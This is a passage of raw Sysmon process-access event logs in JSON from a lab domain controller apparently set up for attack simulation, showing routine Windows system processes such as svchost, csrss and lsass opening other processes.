06:51:52.781","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4034,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:52.781\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:52.781","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4035,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:52.781\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:52.781","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4036,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:52.781\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:52.781","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4037,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:52.781\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:52.781","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4038,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:52.781\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:52.781","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4039,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:52.781\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1108-5F25-0000-001079C60500}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:52.781","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1108-5F25-0000-001079C60500}","TargetProcessId":"2504","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4040,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:52.781\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1108-5F25-0000-001079C60500}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:52.781","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1108-5F25-0000-001079C60500}","TargetProcessId":"2504","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4041,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:52.921\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-10E9-5F25-0000-0010E31C0500}\r\nTargetProcessId: 3136\r\nTargetImage: C:\\Windows\\system32\\sppsvc.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:52.921","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-10E9-5F25-0000-0010E31C0500}","TargetProcessId":"3136","TargetImage":"C:\\Windows\\system32\\sppsvc.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4042,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:52.921\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-10E9-5F25-0000-0010E31C0500}\r\nTargetProcessId: 3136\r\nTargetImage: C:\\Windows\\system32\\sppsvc.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 